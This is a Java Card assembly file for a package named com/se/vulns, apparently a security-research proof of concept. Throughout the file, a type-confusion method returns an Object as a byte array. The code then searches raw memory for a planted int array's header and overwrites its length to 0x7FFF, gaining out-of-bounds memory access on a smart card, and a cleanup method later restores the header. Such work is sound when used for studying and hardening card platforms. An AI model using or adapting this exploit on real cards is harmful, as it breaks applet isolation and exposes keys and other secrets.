// converted by version 1.2
// on Sun Apr 05 17:30:56 CEST 2020

.package com/se/vulns {
	.aid 0xA0:0x0:0x0:0x0:0x62:0x3:0x1:0xC:0x2;
	.version 0.0;

	.imports {
		0xA0:0x0:0x0:0x0:0x62:0x0:0x1 1.0;		//java/lang
	}

	.constantPool {
		// 0
		instanceFieldRef short Cast/len;
		// 1
		staticMethodRef 0.0.0()V;		// java/lang/Object.<init>()V
		// 2
		staticFieldRef byte[] Cast/bmem;
		// 3
		staticFieldRef int[] Cast/imem;
		// 4
		classRef Cast;
		// 5
		staticMethodRef Cast/<init>()V;
		// 6
		staticFieldRef Cast Cast/c;
		// 7
		staticMethodRef Cast/cast2tab([BLjava/lang/Object;)[B;
			.descriptor	Ljava/lang/Object;	0.0;

		// 8
		staticMethodRef Cast/bmem()[B;
		// 9
		staticFieldRef short Cast/imem_off;
	}

	.class public Cast 0 extends 0.0 {		// extends java/lang/Object

		.fields {
			 short len 0;		// S
			 short dummy 1;		// S
			public static final byte BMEM_SIZE = 2;		// B
			public static final byte IMEM_SIZE = 2;		// B
			public static final byte IMEM_OFF_START = 2;		// B
			public static final byte IMEM_OFF_END = 20;		// B
			static Cast c;		// Lcom/se/vulns/Cast;
			static byte[] bmem;		// [B
			static int[] imem;		// [I
			static short imem_off;		// S
		}

		.publicMethodTable 1 {
			equals(Ljava/lang/Object;)Z;
		}

		.packageMethodTable 0 {
		}

		.method public <init>()V 0 {
			.stack 2;
			.locals 0;

				L0:	aload_0;
					invokespecial 1;		// java/lang/Object.<init>()V
					aload_0;
					sspush 32767;
					putfield_s 0;		// short com/se/vulns/Cast.len
					return;
		}

		.method public static cast2tab([BLjava/lang/Object;)[B 1 {
			.stack 1;
			.locals 0;

			.descriptor	Ljava/lang/Object;	0.0;

				L0:	aload_0;
					areturn;
		}

		.method public static bmem()[B 2 {
			.stack 4;
			.locals 0;

				L0:	getstatic_a 2;		// reference com/se/vulns/Cast.bmem
					ifnonnull L2;
				L1:	sconst_2;
					newarray 13;
					putstatic_a 3;		// reference com/se/vulns/Cast.imem
					getstatic_a 3;		// reference com/se/vulns/Cast.imem
					sconst_0;
					iipush 287454020;
					iastore;
					getstatic_a 3;		// reference com/se/vulns/Cast.imem
					sconst_1;
					iipush 1432778632;
					iastore;
					new 4;		// com/se/vulns/Cast
					dup;
					invokespecial 5;		// com/se/vulns/Cast.<init>()V
					putstatic_a 6;		// reference com/se/vulns/Cast.c
					sconst_2;
					newarray 11;
					putstatic_a 2;		// reference com/se/vulns/Cast.bmem
				L2:	getstatic_a 2;		// reference com/se/vulns/Cast.bmem
					getstatic_a 6;		// reference com/se/vulns/Cast.c
					invokestatic 7;		// com/se/vulns/Cast.cast2tab([BLjava/lang/Object;)[B
					areturn;
		}

		.method public static imem()[I 3 {
			.stack 6;
			.locals 6;

				L0:	invokestatic 8;		// com/se/vulns/Cast.bmem()[B
					astore_0;
					sconst_2;
					sstore_1;
				L1:	sload_1;
					bspush 20;
					if_scmpge_w L9;
				L2:	aload_0;
					sload_1;
					baload;
					ifne_w L8;
				L3:	aload_0;
					sload_1;
					sconst_1;
					sadd;
					baload;
					getstatic_a 3;		// reference com/se/vulns/Cast.imem
					arraylength;
					if_scmpne_w L8;
				L4:	aload_0;
					sload_1;
					sconst_2;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 24;
					ishl;
					istore_2;
					iload_2;
					aload_0;
					sload_1;
					sconst_3;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 16;
					ishl;
					ior;
					istore_2;
					iload_2;
					aload_0;
					sload_1;
					sconst_4;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 8;
					ishl;
					ior;
					istore_2;
					iload_2;
					aload_0;
					sload_1;
					sconst_5;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					ior;
					istore_2;
					aload_0;
					sload_1;
					bspush 6;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 24;
					ishl;
					istore 4;
					iload 4;
					aload_0;
					sload_1;
					bspush 7;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 16;
					ishl;
					ior;
					istore 4;
					iload 4;
					aload_0;
					sload_1;
					bspush 8;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					bipush 8;
					ishl;
					ior;
					istore 4;
					iload 4;
					aload_0;
					sload_1;
					bspush 9;
					sadd;
					baload;
					s2i;
					sipush 255;
					iand;
					ior;
					istore 4;
					getstatic_a 3;		// reference com/se/vulns/Cast.imem
					sconst_0;
					iaload;
					iload_2;
					icmp;
					ifne L7;
				L5:	getstatic_a 3;		// reference com/se/vulns/Cast.imem
					sconst_1;
					iaload;
					iload 4;
					icmp;
					ifne L7;
				L6:	aload_0;
					sload_1;
					bspush 127;
					bastore;
					aload_0;
					sload_1;
					sconst_1;
					sadd;
					sconst_m1;
					bastore;
					sload_1;
					putstatic_s 9;		// short com/se/vulns/Cast.imem_off
					goto L9;
				L7:	goto_w L1;
				L8:	sinc 1 1;
					goto_w L1;
				L9:	getstatic_a 3;		// reference com/se/vulns/Cast.imem
					areturn;
		}

		.method public static cleanup()V 4 {
			.stack 3;
			.locals 1;

				L0:	invokestatic 8;		// com/se/vulns/Cast.bmem()[B
					astore_0;
					aload_0;
					getstatic_s 9;		// short com/se/vulns/Cast.imem_off
					sconst_0;
					bastore;
					aload_0;
					getstatic_s 9;		// short com/se/vulns/Cast.imem_off
					sconst_1;
					sadd;
					sconst_2;
					bastore;
					return;
		}

	}

}
